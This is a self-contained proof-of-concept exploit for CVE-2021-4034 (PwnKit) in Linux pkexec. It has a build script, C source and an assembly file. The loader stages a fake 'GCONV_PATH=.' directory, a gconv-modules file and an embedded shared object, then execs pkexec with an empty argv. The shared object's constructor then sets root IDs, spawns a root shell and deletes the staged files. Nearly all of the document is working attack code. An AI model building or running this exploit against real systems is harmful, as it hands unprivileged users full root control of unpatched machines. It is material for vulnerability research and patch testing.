CVE-2021-4034 (pkexec) self contained exploit PoC
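#!/bin/bash
# Builds the self-contained CVE-2021-4034 PoC in two passes over pwnkit.c:
#   1. pwnkit.c            -> pwnkit.so  (the fake gconv module; its library
#                                         constructor is the payload)
#   2. pwnkit.c -DLOADER + pwnkit.S -> pwnkit
#      (the loader; pwnkit.S embeds pwnkit.so via .incbin, so the single
#       `pwnkit` binary carries everything and the .so can be deleted)
# Abort on the first failing step so a broken or stale pwnkit.so is never
# embedded into the loader.
set -euo pipefail

# .incbin in pwnkit.S resolves "pwnkit.so" relative to the assembler's cwd,
# so always build from the directory holding the sources.
cd "$(dirname "$0")"

# The intermediate .so is only needed while assembling the loader; drop it
# whether or not the build succeeds.
trap 'rm -f pwnkit.so' EXIT

gcc -fPIC -shared pwnkit.c -o pwnkit.so
strip -s pwnkit.so
gcc -DLOADER pwnkit.c pwnkit.S -o pwnkit
strip -s pwnkit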
/**
* @file pwnkit.c
* @author Smx (smxdev4@gmail.com)
* @brief
* CVE-2021-4034 (pkexec) self contained exploit PoC
* Implementation of the Qualys paper
* @version 0.1
* @date 2022-01-26
* @copyright Copyright (c) 2022
*/
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <libgen.h>
#include <linux/limits.h>
#include <spawn.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>
/*
 * Conversion entry point that glibc expects every gconv module to export.
 * It never does real work here: the payload lives in the library
 * constructor (ctor below), which has already executed by the time the
 * loader could call this. All arguments are ignored and the call always
 * reports 4 (presumably __GCONV_EMPTY_INPUT from glibc's gconv.h -- confirm
 * against the installed headers).
 */
int gconv (void *step,
void *data,
const unsigned char **inptrp,
const unsigned char *inend,
unsigned char **outbufstart, size_t *irreversible,
int do_flush, int consume_incomplete)
{
    (void)step;
    (void)data;
    (void)inptrp;
    (void)inend;
    (void)outbufstart;
    (void)irreversible;
    (void)do_flush;
    (void)consume_incomplete;

    enum { GCONV_STATUS = 4 };
    return GCONV_STATUS;
}
/* glibc gconv module hook (presumably invoked when the module is loaded);
 * there is nothing to initialise, so it always reports success (0). */
int gconv_init (void *ignored){ (void)ignored; return 0; }
/* glibc gconv module hook (presumably invoked when the module is unloaded);
 * nothing was set up, so it always reports success (0). */
int gconv_end (void *ignored){ (void)ignored; return 0; }
/* Names the loader (main) and the payload (ctor) must agree on. */
#define TARGET_VAR "GCONV_PATH"   /* env var injected into pkexec: glibc's gconv module search path */
#define TARGET_PREFIX "gconv"     /* directory holding the module + gconv-modules; also envp[0] in the loader */
#define TARGET_MODULE "pwnkit"    /* module file name (without .so) referenced from gconv-modules */
#define TARGET_CHARSET "PWNKIT"   /* charset name advertised in gconv-modules and passed via CHARSET= */
#ifndef LOADER
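__attribute__((constructor))
/*
 * Payload. Runs automatically when the shared object is loaded -- in the
 * intended flow that is pkexec (setuid root) dlopen()ing it as a gconv
 * module, presumably from its iconv error path as described in the Qualys
 * advisory this file implements. Spawns an interactive root shell, waits
 * for it, then removes everything the loader staged on disk.
 */
void ctor(){
    puts("-----------------");
    puts("-- Smx says hi --");
    puts("-----------------");

    /* The effective uid is expected to be 0 already (setuid pkexec); make
     * the real and saved ids root as well so the shell and anything it
     * spawns keep full privileges. A failure here only means an
     * unprivileged shell, so report it and carry on. */
    if (setresuid(0, 0, 0) != 0 || setresgid(0, 0, 0) != 0) {
        perror("setresuid/setresgid");
    }

    /* Fixed, minimal environment: none of the trigger variables
     * (GCONV_PATH, CHARSET, ...) are passed on to the shell. */
    char *argv[] = {"/bin/sh", NULL};
    char *envp[] = {"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL};
    pid_t pid = 0;
    int rc = posix_spawn(&pid, "/bin/sh",
        NULL, NULL,
        argv, envp
    );
    if (rc != 0) {
        /* posix_spawn() returns the error number instead of setting errno;
         * previously a failed spawn silently fell through to a waitpid(0). */
        errno = rc;
        perror("posix_spawn(/bin/sh)");
    } else {
        /* Block until the interactive shell exits; its status is not needed. */
        int status = 0;
        waitpid(pid, &status, 0);
    }

    /* Best-effort cleanup of everything main() staged. The paths are
     * relative: pkexec inherited the loader's cwd across execve(), so they
     * still resolve here. Failures are deliberately ignored. */
    unlink(TARGET_PREFIX"/"TARGET_MODULE".so");
    unlink(TARGET_VAR"=./"TARGET_PREFIX);
    unlink(TARGET_PREFIX"/gconv-modules");
    rmdir(TARGET_VAR"=.");
    rmdir(TARGET_PREFIX);
}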
#endif
#ifdef LOADER
/* Start/end labels of the embedded pwnkit.so image, defined in pwnkit.S
 * (.incbin between blob_start and blob_end). Only their addresses are
 * ever used; the declared pointee type is irrelevant. */
extern void *blob_start, *blob_end;
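/* Create (or truncate) `path` with `mode` and write all `len` bytes of
 * `data` to it. The descriptor never outlives this call, so nothing leaks
 * into the exec'd pkexec. Returns 0 on success, -1 with errno set otherwise. */
static int write_file(const char *path, const void *data, size_t len, mode_t mode){
    int fd = open(path, O_CREAT | O_WRONLY | O_TRUNC, mode);
    if (fd < 0) {
        return -1;
    }
    const unsigned char *p = data;
    while (len > 0) {
        ssize_t n = write(fd, p, len);
        if (n < 0) {
            int saved = errno;   /* close() may clobber errno */
            close(fd);
            errno = saved;
            return -1;
        }
        p += n;
        len -= (size_t)n;
    }
    return close(fd);
}

/* mkdir() that tolerates a directory left behind by an earlier run.
 * Returns 0 on success or EEXIST, -1 with errno set otherwise. */
static int make_dir(const char *path){
    if (mkdir(path, 0755) == 0 || errno == EEXIST) {
        return 0;
    }
    return -1;
}

/*
 * Loader entry point: stage the on-disk trigger next to this binary, then
 * exec pkexec with the crafted argv/envp from the Qualys CVE-2021-4034
 * write-up this file implements. On success execve() replaces the process
 * and this never returns; on failure the failing step is reported on
 * stderr and 1 is returned, leaving whatever was already staged in place.
 */
int main(int argc, char *argv[]){
    (void)argc;
    (void)argv;

    /* All paths below are relative to the loader's own directory. pkexec
     * inherits that cwd across execve(), which is what lets the payload
     * (ctor in pwnkit.so) delete the same relative paths afterwards. */
    char buf[PATH_MAX];
    ssize_t len = readlink("/proc/self/exe", buf, sizeof(buf) - 1);
    if (len < 0) {
        perror("readlink(/proc/self/exe)");
        return 1;
    }
    buf[len] = '\0';   /* readlink() does not NUL-terminate */
    if (chdir(dirname(buf)) != 0) {
        perror("chdir");
        return 1;
    }

    /* A directory literally named "GCONV_PATH=." plus a prefix dir for the
     * module. With PATH="GCONV_PATH=." the path search pkexec performs on
     * the (out-of-bounds) argv[0] == envp[0] == "gconv" yields
     * "GCONV_PATH=./gconv", which pkexec writes back into the environment
     * -- that is the injected GCONV_PATH (see the advisory). */
    if (make_dir(TARGET_VAR"=.") != 0 || make_dir(TARGET_PREFIX) != 0) {
        perror("mkdir");
        return 1;
    }

    /* The embedded module image; 0777 (less umask) so root's dlopen can read it. */
    size_t blob_len = (size_t)((uintptr_t)&blob_end - (uintptr_t)&blob_start);
    if (write_file(TARGET_PREFIX"/"TARGET_MODULE".so", &blob_start, blob_len, 0777) != 0) {
        perror("write pwnkit.so");
        return 1;
    }

    /* Empty file; only its existence and exec bit matter, so the PATH
     * lookup of "gconv" above resolves to it. */
    if (write_file(TARGET_VAR"=./"TARGET_PREFIX, NULL, 0, 0777) != 0) {
        perror("write PATH trigger");
        return 1;
    }

    /* gconv-modules: declare a PWNKIT <-> INTERNAL conversion provided by
     * module "pwnkit" (our .so), so iconv_open() on CHARSET loads it. */
    char conf[] =
        "module "TARGET_CHARSET"// INTERNAL "TARGET_MODULE" 1\n"
        "module INTERNAL "TARGET_CHARSET"// "TARGET_MODULE" 1\n"
    ;
    if (write_file(TARGET_PREFIX"/gconv-modules", conf, sizeof(conf) - 1, 0777) != 0) {
        perror("write gconv-modules");
        return 1;
    }

    /* argc == 0 is the precondition for the bug: pkexec then reads
     * argv[1], which is envp[0]. */
    char *args[] = {NULL};
    char *env[] = {
        TARGET_PREFIX,             /* envp[0]: taken as the program name, rewritten to GCONV_PATH=./gconv */
        "PATH="TARGET_VAR"=.",     /* makes the lookup of "gconv" hit our trigger file */
        "CHARSET="TARGET_CHARSET,  /* charset iconv will resolve via our gconv-modules */
        "XAUTHORITY=../",          /* presumably fails pkexec's env validation, reaching the message path that calls iconv -- see advisory */
        NULL
    };
    execve("/usr/bin/pkexec", args, env);

    /* Only reached if execve() itself failed. NOTE(review): kernels that
     * substitute an empty argv[0] when argc == 0 (Linux 5.18+, as I recall
     * -- confirm) defeat the trigger even though execve() succeeds. */
    perror("execve(/usr/bin/pkexec)");
    return 1;
}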
#endif
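/* Embeds the stripped pwnkit.so produced by the build script into the
 * loader binary. The C side (extern blob_start/blob_end) only takes the
 * addresses of these two labels and writes the bytes between them back
 * out to disk. */
.section .data
.globl blob_start
.globl blob_end
blob_start:
/* resolved relative to the assembler's cwd, i.e. the source directory
 * the build script runs from */
.incbin "pwnkit.so"
blob_end:

/* Mark this object as not needing an executable stack; without this note
 * GNU ld links the whole loader with an executable stack (and newer
 * binutils warn about it). */
.section .note.GNU-stack,"",@progbits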